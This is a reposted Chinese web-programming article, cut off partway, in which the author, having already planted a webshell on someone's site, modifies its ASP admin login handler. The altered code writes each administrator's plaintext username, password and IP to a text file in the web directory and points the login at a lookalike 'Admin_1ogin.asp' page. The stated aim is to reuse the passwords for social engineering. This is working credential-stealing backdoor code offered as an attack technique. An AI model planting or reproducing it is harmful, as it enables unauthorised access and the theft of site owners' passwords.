您现在的位置:计算机技术学习网 > 技术中心 > WEB编程 > ASP >

截取asp后台登陆密码的代码

来源:网络 责任编辑:栏目编辑 发表时间:2013-07-01 18:18 点击:
ASPPHPJSPJavaScript网页设计DIVCSSAjax技术HTML5

在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。

下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!
 
省得还要去穷取法破解!
 
这个密码其实说重要也不重要 说不 重要 其实很重要。
因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。
 
首先看看他的后台登陆代码
 
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
 Set CommCls=new CommonCls
 ExCommCls.IsIpAllow
 ExCommCls.CheckInstall
 ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
 Set ExCommCls=nothing
End Sub
public  Sub Execute
 Dim Action
 Action=Request("action")
 Select Case Action
  Case "CheckLogin"
  CheckLogin
  Case "LoginOut"
  LoginOut
  Case Else
  LoginF
 End Select
End Sub
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"admin_login.asp"
  Exit Sub
 End If
 If  Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
  Response.Cookies(Md5(SN))("AdName")=AdName
  Response.Cookies(Md5(SN))("AdPwd")=AdPwd
  session("AdLogin")=Md5(SN)
  ExCommCls.GetConfigCache("*")
  ExCommCls.GetClassCache()
  Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
 Else
  ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"
 End if
End Sub
Private Sub LoginOut
 Response.Cookies(Md5(SN))("AdName")=""
 Response.Cookies(Md5(SN))("AdPwd")=""
 session.Abandon()
 ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 
 ---意思很简单,这里就不明说了, 主要看md5 ,密码使用md5加密 这样的话,我们记录的密码也就没用了,还是md5。所以
 所以想到了,一个钓鱼手法。 它本来的登录界面是
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&""&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"
  Exit Sub
 End If
 If  Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
  Response.Cookies(Md5(SN))("AdName")=AdName
  Response.Cookies((SN))("AdPwd")=AdPwd
  session("AdLogin")=Md5(SN)
  ExCommCls.GetConfigCache("*")
  ExCommCls.GetClassCache()
  Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")Else
  ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"Admin_1ogin.asp"
 End if
End Sub
 
 
看到没,
a=本来的登录页面 现在换成了钓鱼页面
b=本来的登录

    相关新闻>>

      最新推荐更多>>>
      用ASP+XML打造留
      用ASP+XML打造留
      热门新闻进入WEB编程频道>>
      ASP
      多个域名绑定一个空间互不影响(ASP)
      ASP
      ASP中数据库调用时常见错误的现象和解决
      ASP
      asp+sqlserver 分页方法(不用存储过程)
      ASP
      ASP+Access的安全隐患及对策
      ASP
      ASP判断文件地址是否有效!
      ASP
      ASP提速技巧
      发表评论
      请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
      用户名: 验证码:点击我更换图片
      最新评论 更多>>

      今日头条

      更多>>

      推荐热点

      • WAP常见问题问答大全(四)
      • ASP开发必备:WEB打印代码大全
      • ASP调用系统ping命令
      • asp缓存技术
      • ASP教程:第三篇 ASP基础
      • 用ASP+XML打造留言本(4)
      • 关于ASP Recordset 分页出现负数解决方法及建议
      • 用asp怎样编写文档搜索页面(5)
      • ASP处理多关键词查询实例代码

      您可能感兴趣的文章

      快速直达

      新闻点评智问网络

      新闻关注排行榜

      热门推荐 最新推荐

      WEB编程导航

      ASPPHPJSPJavaScript网页设计DIVCSSAjax技术HTML5
      网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
      Copyright © 2008-2015 计算机技术学习交流网. 版权所有

      豫ICP备11007008号-1